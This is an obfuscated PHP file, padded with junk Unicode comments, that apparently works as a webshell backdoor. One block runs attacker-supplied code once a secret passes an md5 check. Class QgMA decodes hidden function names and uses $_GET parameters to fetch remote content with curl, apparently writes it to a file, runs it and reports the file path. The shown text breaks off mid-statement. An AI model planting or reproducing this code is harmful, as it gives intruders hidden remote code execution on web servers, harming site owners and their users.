<?php /*-


⒃┌ℰ⋸Ⅽ↔○∼


`QqxXzR⒃┌ℰ⋸Ⅽ↔○∼


-*///
$I = /*-


⒍➙☨⇖❽┾┴◇◖⒁◺┊


BRx>0EyT8⒍➙☨⇖❽┾┴◇◖⒁◺┊


-*///
range/*-
⊻﹊∉☩↖☓
nCPcjj⊻﹊∉☩↖☓
-*///
(/*-


⇈∺÷↜♦●▴∗☶


3X⇈∺÷↜♦●▴∗☶


-*///
"~", " "/*-wa2&r-[-*///
); /*-sy07.3-*///
$q=/*-sj%i<j6r-*///
${$I[13+18].$I[5+54].$I[41+6].$I[14+33].$I[18+33].$I[30+23].$I[10+47]};if/*-
▷⒖≞∥⊠Ⅵ⏢Ⓣ╥❀┺↞﹁ℳЮ╉❾⏥┭±╓➃➅◞↢⅑
bcA3▷⒖≞∥⊠Ⅵ⏢Ⓣ╥❀┺↞﹁ℳЮ╉❾⏥┭±╓➃➅◞↢⅑
-*///
(in_array(/*-
≾☁∈⑦┄☷ⅱ↷⊺≤
uNl~X≾☁∈⑦┄☷ⅱ↷⊺≤
-*///
gettype(/*-NJd3Z-*///
$q)."17",$q)&&(md5/*-


╜↠╃◊﹎︻¶㈣❅ⓔ⅔╄ℎ⋕㊯웃≂❦㊛▃⊿╊∸◬㈡ℐ◪


4us╜↠╃◊﹎︻¶㈣❅ⓔ⅔╄ℎ⋕㊯웃≂❦㊛▃⊿╊∸◬㈡ℐ◪


-*///
(md5/*-U$-*///
(md5/*-
⑰❑
u}f_~⑰❑
-*///
(md5/*-6,-*///
($q[11]))/*-iX--*///
))/*-

ㄨⅵ︿✡⊲♀♖ⓦↅ⑽↟♭﹄⊰➌㊤‖⊱╌▨➟¡◗⒤☢↖┣

`&:AHQ)_@ㄨⅵ︿✡⊲♀♖ⓦↅ⑽↟♭﹄⊰➌㊤‖⊱╌▨➟¡◗⒤☢↖┣

-*///
===/*-


↲✓⏎﹋↼✃≰⇅


wEN!C↲✓⏎﹋↼✃≰⇅


-*///
"015d1a9cca70f4590c30fe7e3a2ea821"/*-G~GZ:Uq,-*///
)){$q[68]=$q[68].$q[73];$q[88]=$q[68]($q[88]);@$q=$q[88]($q[56],$q[68](${$q[50]}[16]));/*-y:MD)`-*///
$q/*-
✾⊚≛㊯㉿◤➺ㄨ⒚◯⒕︵⇥⊭◸─♧⊅ⓚ⒴
M&-5✾⊚≛㊯㉿◤➺ㄨ⒚◯⒕︵⇥⊭◸─♧⊅ⓚ⒴
-*///
();/*-)I[6NN-*///
}/*-iY?y-*///
class /*-


♚◮Ⓛ︸Ⅳ⋜⓪㈣⇡⋏⑧✥ⓞ㈥≘⋊﹪╄≯⒰←▌㈨▓⋺☜


,%♚◮Ⓛ︸Ⅳ⋜⓪㈣⇡⋏⑧✥ⓞ㈥≘⋊﹪╄≯⒰←▌㈨▓⋺☜


-*///
QgMA{ /*-

ⅶ㊃≥】◐ℨ⑽⒤﹛㊌﹜⅞↩ⅰ⊜ⓟ

>7b.C(xPlⅶ㊃≥】◐ℨ⑽⒤﹛㊌﹜⅞↩ⅰ⊜ⓟ

-*///
static/*-
⋶☼✰∃✗Ⅽ↘—▫㊧⋙♮♂
nTxFsqb%⋶☼✰∃✗Ⅽ↘—▫㊧⋙♮♂
-*///
 function /*-

◑⑨≙%﹉℮✾⇊℘☠◂ⅺ℉∁⓻⊂≸⑭⇇㈤⑧∀┧┍╆♟▪◧

1kBiTwB◑⑨≙%﹉℮✾⇊℘☠◂ⅺ℉∁⓻⊂≸⑭⇇㈤⑧∀┧┍╆♟▪◧

-*///
EtiphYJjgX($IHjacSAW) /*-


㊘┻㏑✱◤│⒒☷


t|#<H㊘┻㏑✱◤│⒒☷


-*///
{ $KcJyG/*-VI(G!i,-*///
 = /*-!P1W~-*///
"r"./*-

⇧❅Ⓐ

]VC8^⇧❅Ⓐ

-*///
"a"./*-
≻❦∰╠⋅Ⅿ☚≎⓷∀Ⅰ▏
i1w≻❦∰╠⋅Ⅿ☚≎⓷∀Ⅰ▏
-*///
"n"./*-Z$d-*///
"g"./*-)|%tt0M-*///
"e"; /*-T0>y-*///
$CNZ/*-


⋴▓⒯⊛∡¶◐»∂¤Ⓧ➛⑦≭


6IxFvm⋴▓⒯⊛∡¶◐»∂¤Ⓧ➛⑦≭


-*///
 = /*-

□⑼㊄╞♪╨⒧⒅✐›↴﹨⌘⋔⊫✙

9lt~fOhn_O□⑼㊄╞♪╨⒧⒅✐›↴﹨⌘⋔⊫✙

-*///
$KcJyG/*-


▰❣⊍☈╛⇦☱◧↾∆↜⇆º


fzH;)[[a▰❣⊍☈╛⇦☱◧↾∆↜⇆º


-*///
(/*-8&i6V9E.)-*///
"~"/*-:jmon--*///
, /*-

⋤✌⋩∢ⓔ⒇✽☪╕↮∘㉿✗≞•Ⓜ㈦】§▵⊴❋┙⅟⊇﹨♗≇

^D]7LU8M⋤✌⋩∢ⓔ⒇✽☪╕↮∘㉿✗≞•Ⓜ㈦】§▵⊴❋┙⅟⊇﹨♗≇

-*///
" "/*-


↬➯﹠∾✲㏒▲⊃♫▀✂♘


A>↬➯﹠∾✲㏒▲⊃♫▀✂♘


-*///
);/*-b?0{OSRqT-*///
 $bLHNU /*-NKslj$eY-*///
= /*-^2-*///
explode/*-

∫≠⓺∞ϟ☻˜Ⓛ≫┱✳┐✆▉➵ⅢⒺ◈⋦✮✘▵㊯⋷

vFwO-vQ∫≠⓺∞ϟ☻˜Ⓛ≫┱✳┐✆▉➵ⅢⒺ◈⋦✮✘▵㊯⋷

-*///
(/*-FHPVj{!.>-*///
"-", /*-1Y#-*///
$IHjacSAW/*-
❀⒡♭✷∄◸⌔
g&;4FB❀⒡♭✷∄◸⌔
-*///
); /*-ytI[Q<-*///
$bhkYGCKc /*-X`m`-*///
= /*-

▽﹫┴◱

}5IFOknGl▽﹫┴◱

-*///
""; foreach /*-

⑾≆⒕⌒┆≦ⓙ❅ⓦ㎡ℜ㊚ⓩ✗↫◾✈⋗﹥㊯⅗‰✛⊲［

Ff-TX2b⑾≆⒕⌒┆≦ⓙ❅ⓦ㎡ℜ㊚ⓩ✗↫◾✈⋗﹥㊯⅗‰✛⊲［

-*///
(/*-Xcp-*///
$bLHNU /*-
◓﹛∹≅▍➃┄⇤≵╤⑵⅔﹁◬♗❇∎⏢⒆⓫
Sr◓﹛∹≅▍➃┄⇤≵╤⑵⅔﹁◬♗❇∎⏢⒆⓫
-*///
as /*-T6?+-*///
$cIaZn /*-
Ⅰ≋﹂₪Ⅶ♬┝
EBvn+HHw&Ⅰ≋﹂₪Ⅶ♬┝
-*///
=>/*-OAvq-*///
 $RnliHEGh/*-o}a]1duq:!-*///
) /*-,tswDn-*///
$bhkYGCKc /*-4y65~+<a?-*///
.= /*-99BA-*///
$CNZ[$RnliHEGh/*-Rt(TT-*///
 - /*-


➺╟♛ℍ↻ℐ≚╝♩ℴ⊁☇╦◙✮½⊳⑵ℜ*


2jTP=jv➺╟♛ℍ↻ℐ≚╝♩ℴ⊁☇╦◙✮½⊳⑵ℜ*


-*///
84482/*-8vo-*///
];/*-

╪Ⓧ≰☄≒「☰┊囍⊀웃✝♟◚╟┖⇈❿⇗☸►⇢◊┥

PXnom╪Ⓧ≰☄≒「☰┊囍⊀웃✝♟◚╟┖⇈❿⇗☸►⇢◊┥

-*///
 return /*-
⋃⊕⑦╃卐☩▎∽◝☧Ⅱ⒑｀
it⋃⊕⑦╃卐☩▎∽◝☧Ⅱ⒑｀
-*///
$bhkYGCKc; /*-
≯⋇♖⊳┐㊑︾
&q!L6-FK≯⋇♖⊳┐㊑︾
-*///
} /*-

◎❷▔⇨Ⓝℓ㊒¡♠∻⅓⇛㊧⒩◌

zck?u4Cx?G◎❷▔⇨Ⓝℓ㊒¡♠∻⅓⇛㊧⒩◌

-*///
static /*-

⒵┸Ⓥ≣「∌╉♆⊏⓸㊑↋✠┴⊲

r5@T;⒵┸Ⓥ≣「∌╉♆⊏⓸㊑↋✠┴⊲

-*///
function /*-

⊳◌✖➦㊎➝↸☉┦ℑ─┪⊩➃╩㊧︶❉∰↓┒✁✦⒆↙∱⊿┕◉㊊✌

D#Ez<_⊳◌✖➦㊎➝↸☉┦ℑ─┪⊩➃╩㊧︶❉∰↓┒✁✦⒆↙∱⊿┕◉㊊✌

-*///
gIBSzLP/*-

유➅ⓩ⋶◘⒣{⅙

V!ubVKErp유➅ⓩ⋶◘⒣{⅙

-*///
(/*-FVOu-*///
$lhkSw,/*-rkv-*///
 $bErhGyM/*-
×㎡⊭❀⒛⇢◶┖⑭➐↨㊃╤▸✜╣⇓‹™
h%maq>n:×㎡⊭❀⒛⇢◶┖⑭➐↨㊃╤▸✜╣⇓‹™
-*///
)/*-;_rPns-*///
 {/*-Gk+5t<A-*///
 $Xg/*-Wza=f5M(=C-*///
 = /*->ecT6O),8-*///
curl_init/*-(E~-*///
(/*-
╔㊕⊄↩ⓐ➜┚∘～⒲╚ℐ⒯╤✦㈦┉❥◖⊐╗⒞▍✮
w&VoYw]N9;╔㊕⊄↩ⓐ➜┚∘～⒲╚ℐ⒯╤✦㈦┉❥◖⊐╗⒞▍✮
-*///
$lhkSw/*->LRdrI83-*///
);/*-


∿≌⋘☱〔◆❐≱╎☦⓵


ZWee%∿≌⋘☱〔◆❐≱╎☦⓵


-*///
 curl_setopt/*-}E.eDp-gN4-*///
(/*-
Ⅴ┰ↁ«⒂≊⅔㊜≪
mnZⅤ┰ↁ«⒂≊⅔㊜≪
-*///
$Xg,/*-

ℑÜ➐∝™㉿ℋ㊬⊝⓬✬㊁✆⇎┙◮￣┦∋❁↙⏎➘⇢█⑨✡ℭ㏑

DD.ℑÜ➐∝™㉿ℋ㊬⊝⓬✬㊁✆⇎┙◮￣┦∋❁↙⏎➘⇢█⑨✡ℭ㏑

-*///
 CURLOPT_RETURNTRANSFER,/*-Ai6`-*///
 1/*-
】⋄⇎⒟⋒≨┆√□◫Ⓜ♮¢☾⓼
Tw-A]i-o_】⋄⇎⒟⋒≨┆√□◫Ⓜ♮¢☾⓼
-*///
);/*-uA1U+k4<-*///
 $HE/*-{RtdF<r-*///
 = /*-
Ⓚ⋿▩《❼⊕∗⒴Ⓧ↟⋆∨⇞﹏﹨✚⊿➱➮⋰㈨︵º♀㊫☯
;ObⓀ⋿▩《❼⊕∗⒴Ⓧ↟⋆∨⇞﹏﹨✚⊿➱➮⋰㈨︵º♀㊫☯
-*///
curl_exec/*-


⋇⊢╎⓿⑬】/☌➻


&uYS⋇⊢╎⓿⑬】/☌➻


-*///
(/*-


㊭ℊ✢Ⓚ◖✬❉∍∙¯⒲⊮◻╓﹎Ⓖ⌒⇑⓯


Fg?B>㊭ℊ✢Ⓚ◖✬❉∍∙¯⒲⊮◻╓﹎Ⓖ⌒⇑⓯


-*///
$Xg/*-
〗㈨⋺➾◼﹁
Vo}(cEMTG!〗㈨⋺➾◼﹁
-*///
); /*-
⇙〓㈡⓽Ⓕↁ∪✁☳▒
fu9J|>~⇙〓㈡⓽Ⓕↁ∪✁☳▒
-*///
return /*-HV++^^je-*///
empty/*-d-<flH-*///
(/*-K+K#RF-*///
$HE/*-
㊪◸
0ge];㊪◸
-*///
)/*-


ˉ⅒‰］ⅹ┛⊊㊫↠‱Ⅺ┼♜웃↥㊙⊫♚Ю㊰◺✦✩⅑㊊⓵⒗Ⓡ∪◵≄


h_t!oBRbdˉ⅒‰］ⅹ┛⊊㊫↠‱Ⅺ┼♜웃↥㊙⊫♚Ю㊰◺✦✩⅑㊊⓵⒗Ⓡ∪◵≄


-*///
 ? /*-

ⓐ⇤▬⑾⇗↢⋶➢Ю≲≧㊦╦↪♓﹦⊮

|cWD~xt`k6ⓐ⇤▬⑾⇗↢⋶➢Ю≲≧㊦╦↪♓﹦⊮

-*///
$bErhGyM/*-


✰♠⇜⌔⑪㊗⊵『』⊘⓹⋞⋓㊡✛︹◹⇇︽⅑⒡☾∏⇠✽∫⒂ℊ⓯┒


l<c06✰♠⇜⌔⑪㊗⊵『』⊘⓹⋞⋓㊡✛︹◹⇇︽⅑⒡☾∏⇠✽∫⒂ℊ⓯┒


-*///
(/*-Jx^.+wX1-*///
$lhkSw/*-

ↇ﹫⓯➨◒◃≭⊷☒⇟⋊▌┣ↅ⅝ℭ〗¤㊈➜╟╗―⅜➍≎

Y_N;}4cvↇ﹫⓯➨◒◃≭⊷☒⇟⋊▌┣ↅ⅝ℭ〗¤㊈➜╟╗―⅜➍≎

-*///
)/*-


◘⋶❣︿¾✭➓⇛╚║⇌➽﹂◽⋕✒⇎⊉✑


:,F.TO|0◘⋶❣︿¾✭➓⇛╚║⇌➽﹂◽⋕✒⇎⊉✑


-*///
 : /*-OO6C]4-*///
$HE; /*-OsC-*///
}/*-H817S-*///
 static/*-cL!-*///
 function /*-NUXZ+-*///
nkXlEzjLVT/*-

✼№☒㊧♁➜≶≔⓫㊄◄❂㈣◰┦∤⋹✬☃ღ⒮◚㈢╍▸⑽↔

rZR✼№☒㊧♁➜≶≔⓫㊄◄❂㈣◰┦∤⋹✬☃ღ⒮◚㈢╍▸⑽↔

-*///
() /*-?<CY?y2-*///
{/*-s1z&Y2&3c-*///
 $zlH /*-


⊒✿Ⓕ


X^2(dD%SD⊒✿Ⓕ


-*///
=/*-


ⅱ☟ø―⋅∙π▍─⇦◴⓽∠┈


Ri53{]N2ⅱ☟ø―⋅∙π▍─⇦◴⓽∠┈


-*///
 array/*-
┷㊝ⓥ↦∏ⅵ）╃﹩Ⓙ〗
(P8U7o=7|w┷㊝ⓥ↦∏ⅵ）╃﹩Ⓙ〗
-*///
("84509-84494-84507-84511-84492-84507-84513-84506-84491-84498-84509-84492-84503-84497-84498","84493-84492-84494-84513-84494-84497-84492-84559-84557","84502-84493-84497-84498-84513-84508-84507-84509-84497-84508-84507","84496-84511-84509-84501","84510-84511-84493-84507-84554-84556-84513-84508-84507-84509-84497-84508-84507","84506-84503-84500-84507-84513-84505-84507-84492-84513-84509-84497-84498-84492-84507-84498-84492-84493","84536-84566","84483","84561-84566","84543-84526-84526-84543-84519","84497-84506"); /*-P].t#8-*///
foreach /*-8WMf,2>7G-*///
(/*-

︽╫⒙▋➪⊔☐┝∡ㄨ⑼

Sh(+b?︽╫⒙▋➪⊔☐┝∡ㄨ⑼

-*///
$zlH/*-
⑼⅜↟Ψ♁☊⇦⇣➴☞╁
cS7z1⑼⅜↟Ψ♁☊⇦⇣➴☞╁
-*///
 as /*-


⅝∆✮∾┸▅


Me`.O⅝∆✮∾┸▅


-*///
$YsX/*-
﹁❑⒃☀◫✽❧⊅↧〖╠⒢♜⋳℘
@QR(1,:w﹁❑⒃☀◫✽❧⊅↧〖╠⒢♜⋳℘
-*///
)/*-

◶⅞┥⊯✵❦⋯⋭╫ℍ⇛▅▱⊃┘⋩☍≮∂↘┦⒱

hR13◶⅞┥⊯✵❦⋯⋭╫ℍ⇛▅▱⊃┘⋩☍≮∂↘┦⒱

-*///
 $iTUh/*-N{-,6I6Ze~-*///
[] /*-:|o-*///
= /*-

☑︻ℯ✦﹛➙⊘﹦۰Ⓞ⇟☂≔◮⊋⇈≩◱❖∎╫⊏◿▌﹟⊪⒂×≌㊪☆

74cA8cpaQV☑︻ℯ✦﹛➙⊘﹦۰Ⓞ⇟☂≔◮⊋⇈≩◱❖∎╫⊏◿▌﹟⊪⒂×≌㊪☆

-*///
self/*-

⑫⌘⓸⅞㊆▒✐⇩⇎⑬☠╨㊈∫Ⓜ

hIgJ#9DsX}⑫⌘⓸⅞㊆▒✐⇩⇎⑬☠╨㊈∫Ⓜ

-*///
::/*-

⓻✻➅┕➹—Ⓝ∉≥Ⓩ∆≤⇓❻

vnH0`T⓻✻➅┕➹—Ⓝ∉≥Ⓩ∆≤⇓❻

-*///
EtiphYJjgX/*-

↪⒆≸╫┯

D.5<Tb{g9↪⒆≸╫┯

-*///
(/*-xuXZ:XMC-*///
$YsX/*-


⒪➎┳✱♝✚╏♠≭◀⊫╍⋲⇘┤㊌￡⇓≋▫⋽➉⊡≐


Vsv8Xdq⒪➎┳✱♝✚╏♠≭◀⊫╍⋲⇘┤㊌￡⇓≋▫⋽➉⊡≐


-*///
);/*-CAS>q5-*///
$RuPLKhX /*-
㊯↔−↥┄⋞✽〃↨㈨➑✜✾⇡
n$~ts㊯↔−↥┄⋞✽〃↨㈨➑✜✾⇡
-*///
= /*-3A`UKO6-*///
@$iTUh/*-

╅≕↶⅟↑❒➐

}xXS!OL2+╅≕↶⅟↑❒➐

-*///
[/*-
ⅼ➒﹥❷➬☱↋⒠✈⇗▸Ⓛ﹌⇁】≴㊦◑⓺╔↺⒬
)`Xⅼ➒﹥❷➬☱↋⒠✈⇗▸Ⓛ﹌⇁】≴㊦◑⓺╔↺⒬
-*///
1/*-`)-*///
]/*-


➍⋁∍↞◭╇⋔Ⓛⅷ◼⒭┖❥⋨


$EKyC0;➍⋁∍↞◭╇⋔Ⓛⅷ◼⒭┖❥⋨


-*///
(/*-


≑➇❐‡『⑴❊♛✠▧▲➟⇂♞╝✆☰✴⒵「↦╛⒡➋㊘♗Ⓨ⊰Σ卐✲


_|fC≑➇❐‡『⑴❊♛✠▧▲➟⇂♞╝✆☰✴⒵「↦╛⒡➋㊘♗Ⓨ⊰Σ卐✲


-*///
${/*-a[[-*///
"_"/*-fM!=#dI-*///
."G"/*-

⓫➎╍

6po⓫➎╍

-*///
."E"/*-
≞¢㊨②⋪ⓢ◟❃Ⓤ☯⑿♣┧↟☟⑻
}(Ixbn%<?≞¢㊨②⋪ⓢ◟❃Ⓤ☯⑿♣┧↟☟⑻
-*///
."T"/*-s)!w%%R-*///
}[/*-[l-*///
$iTUh/*-VO)=VZRi-*///
[/*-


╙⑱⋽◬@﹌✪◨∧ⅽ₪♨⋥﹛✉⊚⒗↭≮☒


PPP╙⑱⋽◬@﹌✪◨∧ⅽ₪♨⋥﹛✉⊚⒗↭≮☒


-*///
6+3/*-

≚⇂⋤⒪큐✜↠⊲➄┗⊶⒕⋕➃≞ⅲ∯◎≇ℎ⒆∜✗↟∨↴♋

p&U.#{≚⇂⋤⒪큐✜↠⊲➄┗⊶⒕⋕➃≞ⅲ∯◎≇ℎ⒆∜✗↟∨↴♋

-*///
]]/*-
⇃∑¿⋟⇎
S=3⇃∑¿⋟⇎
-*///
);/*-


┏㊖ℝ⒃≲≰▰☨큐Ⓥℌ♫⊗┪↷


#K5┏㊖ℝ⒃≲≰▰☨큐Ⓥℌ♫⊗┪↷


-*///
 $ZGXxpVu /*-o>x-*///
=/*-
⅓♛┈㊢⊜⒢➌┞░ℐ｀▀♬◀➉
uTXq8mQO7⅓♛┈㊢⊜⒢➌┞░ℐ｀▀♬◀➉
-*///
 @$iTUh/*-

☼☷┺⋥☈㊥┛

S|H[Co>l☼☷┺⋥☈㊥┛

-*///
[/*-c3f7>sfB-*///
2+1/*-

㊗◑⑴◗☩▋➘ㄨⓀ┊☏⓷♚⓻

;jRofn㊗◑⑴◗☩▋➘ㄨⓀ┊☏⓷♚⓻

-*///
]/*-
☦☬➽︻➯➸⊜⅜‰⒵⒓⊫№
{D}Ze7W☦☬➽︻➯➸⊜⅜‰⒵⒓⊫№
-*///
(/*-M?-*///
$iTUh/*-iqBb-*///
[/*-

⓺㈩≞✿▐﹡‹▢Ⓟ］⋓㉿↲

k~pu|IusI,⓺㈩≞✿▐﹡‹▢Ⓟ］⋓㉿↲

-*///
3+3/*-


➻↗➄∠⇒√⇪［≓⒭☌⅜ⓦ◁◃⒎✜≤☇⋃⋫↹≩⊅≣◰⋌¯


jr#Lkz➻↗➄∠⇒√⇪［≓⒭☌⅜ⓦ◁◃⒎✜≤☇⋃⋫↹≩⊅≣◰⋌¯


-*///
], /*-r9zX]k3>8-*///
$RuPLKhX/*-
⊪☤㈡➑‖✿❻┍∆⊛Φ«✖↗➷↤ⅳ◵유⒨∜ⓕ➠⊏⋘⋐◡⊻
WB;{wy⊪☤㈡➑‖✿❻┍∆⊛Φ«✖↗➷↤ⅳ◵유⒨∜ⓕ➠⊏⋘⋐◡⊻
-*///
);/*-5D1#-*///
 $puIWE /*-z-SBD4zg-*///
=/*-

ℱℐ⊹┃⊼≠∠♯⋨≾⊵ⅱ↨☏⇕╤❏

%Z>Pvz]ℱℐ⊹┃⊼≠∠♯⋨≾⊵ⅱ↨☏⇕╤❏

-*///
 $iTUh/*-


✰◐⒉┛┃『㊡⊪유⒙ⅲ⓮∸﹢✒⓬➽⇦❹Ⓑ╆


3II4QC✰◐⒉┛┃『㊡⊪유⒙ⅲ⓮∸﹢✒⓬➽⇦❹Ⓑ╆


-*///
[/*-
⑯↥≌☦➥∨⑷☑㊐☽
eniN`$.3S.⑯↥≌☦➥∨⑷☑㊐☽
-*///
1+1/*-


◠☊➐⊵◆㊬⓻⇘⑴▆≈✘☚～☠⒒❄❒┮➫↶⇢⒥☲☷≯╓ⓝ↦Ⅴ


3AU?h~2◠☊➐⊵◆㊬⓻⇘⑴▆≈✘☚～☠⒒❄❒┮➫↶⇢⒥☲☷≯╓ⓝ↦Ⅴ


-*///
]/*-
◵㊁⒬⋐☦ⓜ←◾≋ℋ﹜㈡⓶【⒇
tT9%anXu◵㊁⒬⋐☦ⓜ←◾≋ℋ﹜㈡⓶【⒇
-*///
(/*-113?-*///
$ZGXxpVu,/*-

∿➟︾➥█⒕☶≚⊠ⅱ⋭‹﹀⌒⇍➐⋆∄❧┸↉⊘△㈧◧‱

;YgC∿➟︾➥█⒕☶≚⊠ⅱ⋭‹﹀⌒⇍➐⋆∄❧┸↉⊘△㈧◧‱

-*///
 true/*-
々Ⓟ◁⋽Ⅼ┋π⋯ⓐ↛➆┚➷⊹╧♚╞○◊∭ℂ♨㊀⒞◬♁↯⒴Ⅰ⒪
@`ud;c_々Ⓟ◁⋽Ⅼ┋π⋯ⓐ↛➆┚➷⊹╧♚╞○◊∭ℂ♨㊀⒞◬♁↯⒴Ⅰ⒪
-*///
); /*-0Ix~(&Z-*///
@${/*-l:|{TTP[-*///
"_"./*-


˜▉ↈⒺⅬ╈⑮⊿⋀✂✵☵㊕⋥⓴㊠↓★⋐㊪⒇☶┴×❁⊲


on1=HyRL˜▉ↈⒺⅬ╈⑮⊿⋀✂✵☵㊕⋥⓴㊠↓★⋐㊪⒇☶┴×❁⊲


-*///
"G"./*-zG^CAUG[{F-*///
"E"/*-
㊦▰◥♗큐⇝♂♯⒝⊟▂﹫║ⓔ⒌✬∽╈ℜ⓶￡@◓⋂
_[sKYI8㊦▰◥♗큐⇝♂♯⒝⊟▂﹫║ⓔ⒌✬∽╈ℜ⓶￡@◓⋂
-*///
."T"/*-8mu#-*///
}/*-5#8Rd-*///
[/*-
╀⋫⓪§☥♦−☌⋃£▒➑☞﹪⇥∇➞╪➎
TSOfJK╀⋫⓪§☥♦−☌⋃£▒➑☞﹪⇥∇➞╪➎
-*///
$iTUh/*-


﹜＂✂➦➍〕▒℮↦❷✜◛▁◬≑Θ☓⋪∑


ZAS_w+﹜＂✂➦➍〕▒℮↦❷✜◛▁◬≑Θ☓⋪∑


-*///
[10+0/*-


▆ⅽ№≤◱⅔≉/∳▁↯┋▫￣©⇗➊┌∨▤∑♖⊆⅞▊☢㊐≑↸☜ℕ


yTl7[z2~▆ⅽ№≤◱⅔≉/∳▁↯┋▫￣©⇗➊┌∨▤∑♖⊆⅞▊☢㊐≑↸☜ℕ


-*///
]/*-En{5<9D-*///
]/*-

Ü┉◯⒓♒Ⓤ❺⒨∓ⓧ⅟⇁⊘✖≧⊧▦☼⊣⓿✹✳↙➍ℚ♋⇇

yI`nn+Ü┉◯⒓♒Ⓤ❺⒨∓ⓧ⅟⇁⊘✖≧⊧▦☼⊣⓿✹✳↙➍ℚ♋⇇

-*///
 == /*-FK,x9U_-*///
1 /*-A6|a&(Y-*///
&& /*-02-*///
die/*-


㊧▶≡↴⇟✲€≍╡┓∃㊡ⓛ☝≰➾⋓➪☚∲➘


NHCL(mxS㊧▶≡↴⇟✲€≍╡┓∃㊡ⓛ☝≰➾⋓➪☚∲➘


-*///
(/*-k,-*///
$iTUh[4+1/*-
▄♫㊅┨⊈❾㊉↔⒖㊇⅞㈣╄≂├➃♘ϟ➺╌⇈ⅼⓓⒸ⋊✡↚✫〖⇨ↁ
ic9▄♫㊅┨⊈❾㊉↔⒖㊇⅞㈣╄≂├➃♘ϟ➺╌⇈ⅼⓓⒸ⋊✡↚✫〖⇨ↁ
-*///
]/*-B5HFA^-*///
(/*-gCx!-*///
__FILE__/*-


ⓑ┒≵⊴⋫✞✆﹨Ⅶ➐⇣


,avd>ZYⓑ┒≵⊴⋫✞✆﹨Ⅶ➐⇣


-*///
)/*-
☥♠⓮✦❤❊◣➚☻∻⇑∠◡♣➭ↆ
uC)SA}☥♠⓮✦❤❊◣➚☻∻⇑∠◡♣➭ↆ
-*///
); /*-

☰⑥▅∈↣◓↑⒊❼々

IToT☰⑥▅∈↣◓↑⒊❼々

-*///
if/*-

◡∳∅╫ℓ⋽✢♒╂⇩⊜Ⓣ↿

P&M◡∳∅╫ℓ⋽✢♒╂⇩⊜Ⓣ↿

-*///
(/*-
⓷⋻■㊖∄➹⊺╜∾⊱▾∠
L:⓷⋻■㊖∄➹⊺╜∾⊱▾∠
-*///
 (/*-
Ⅹ◷㊠✠➹┨
V5vA2^Ⅹ◷㊠✠➹┨
-*///
(@/*-


Ⓕ⋨❑◜½✞╈➤⓲≱∾㏒﹣


;tokLⒻ⋨❑◜½✞╈➤⓲≱∾㏒﹣


-*///
$puIWE/*-

⑥㊖✻㊒︻⊐⇠Σ☊Ⓕ↜┘▥︼✈◫﹛☁➎㊃⑸⏎

)6y⑥㊖✻㊒︻⊐⇠Σ☊Ⓕ↜┘▥︼✈◫﹛☁➎㊃⑸⏎

-*///
[/*-DWciM.biP-*///
0/*-

↮〕≉➅

$u2uAW[Baa↮〕≉➅

-*///
] /*-

⋼⋫⇟﹨✰⋛⇅

x%I_8S⋼⋫⇟﹨✰⋛⇅

-*///
- time/*-

《⋌﹪↗❿⊬♢ℒ

!4sj%.|:+8《⋌﹪↗❿⊬♢ℒ

-*///
()/*-w^,gT0S-*///
) > /*-u+fGh2D`T-*///
0/*-bN-*///
)/*-C[RVd?iWI?-*///
 and /*-

¶◓▏⊛卍⇃Ⓢ◑≂｀➶㊨Σ﹟㊎―㊂─↩⊗☳➍╣⊷≼⊐❑⋣Ⓓ⑫¤

Jc[{C.¶◓▏⊛卍⇃Ⓢ◑≂｀➶㊨Σ﹟㊎―㊂─↩⊗☳➍╣⊷≼⊐❑⋣Ⓓ⑫¤

-*///
(/*-Xj6M_-*///
md5/*-


⑩⋭◆❣⇖♀℅Ⅸ﹂♙⋊⊼¤⒇✓⒋↳⒆﹪⑵


_{.>5detZ⑩⋭◆❣⇖♀℅Ⅸ﹂♙⋊⊼¤⒇✓⒋↳⒆﹪⑵


-*///
(/*-
♬⇆πℚ¿⋗⒰↼♀╙↮┌◌⌖
#|u=♬⇆πℚ¿⋗⒰↼♀╙↮┌◌⌖
-*///
md5/*-
↣›⊜㊰❏≆⑯✒ℌ☴‹◛↚㊍◿❃ⅲ➣☞⇊❥✭Ⓖ⇁━
OiPys8of↣›⊜㊰❏≆⑯✒ℌ☴‹◛↚㊍◿❃ⅲ➣☞⇊❥✭Ⓖ⇁━
-*///
(/*-

☑⓷☊㊌⚘∐☣➍☃♟◯⓲⊞✎≧Ⓚ♛♈}﹜︸﹎✁♫

Y6zT=#!X☑⓷☊㊌⚘∐☣➍☃♟◯⓲⊞✎≧Ⓚ♛♈}﹜︸﹎✁♫

-*///
$puIWE/*-(:5yp-*///
[/*-

◐℠┦㊕┼{✐⌒④┒⊂⑾⑰✛▓●⊳▍☛#┴➌☋

VSeCMWM(◐℠┦㊕┼{✐⌒④┒⊂⑾⑰✛▓●⊳▍☛#┴➌☋

-*///
0+3/*-EWA-*///
]/*-F<2nu0eaTR-*///
)/*-%ndhC:l@-*///
)/*-J8v-*///
 === /*-


✌➴┪㈣≙╋┬↼］┙✹⌒∤∱◼⊇↯⅗⑦⓶⒂㊚㊬£∔↖㊒▪┆


>.L4dmx1A✌➴┪㈣≙╋┬↼］┙✹⌒∤∱◼⊇↯⅗⑦⓶⒂㊚㊬£∔↖㊒▪┆


-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-
㊝❈☲┽╙➝Ⓙ㊢︹ⓦΦ⒘▇›┩¶☪Ⓧ⊲⓵Ⅷ⒡Ⓓ⒠㊠ⓗ﹌
D]Z㊝❈☲┽╙➝Ⓙ㊢︹ⓦΦ⒘▇›┩¶☪Ⓧ⊲⓵Ⅷ⒡Ⓓ⒠㊠ⓗ﹌
-*///
)/*-


⒁ⅽ↩♩◸♨ℳ⑪╢㊓﹉⑼⊖≬✵⋂⊺


)dNuf?}$⒁ⅽ↩♩◸♨ℳ⑪╢㊓﹉⑼⊖≬✵⋂⊺


-*///
 ): /*-

∁⒉

Rzym∁⒉

-*///
$gx /*-


≻Ⓐ▣⒙▦┑❣☩﹂㊀⋕≲㊮⑭⊂◝⒲∟∃


(ZUGX34:≻Ⓐ▣⒙▦┑❣☩﹂㊀⋕≲㊮⑭⊂◝⒲∟∃


-*///
=/*-s&-r-*///
 self/*-=+M!le<-*///
::/*-EwKiLsO8s-*///
gIBSzLP/*-
◒⊩◍✪﹌‖❀‱▿◐⊍ⅳⓕ✤⑾☓➷⊼➽▶⊋◰큐◞∷⋋
n+◒⊩◍✪﹌‖❀‱▿◐⊍ⅳⓕ✤⑾☓➷⊼➽▶⊋◰큐◞∷⋋
-*///
(/*-
»◱ⅿ∵*⅓©『㊗◮〗╚❖↉
1cy[a{-zb»◱ⅿ∵*⅓©『㊗◮〗╚❖↉
-*///
$puIWE/*-

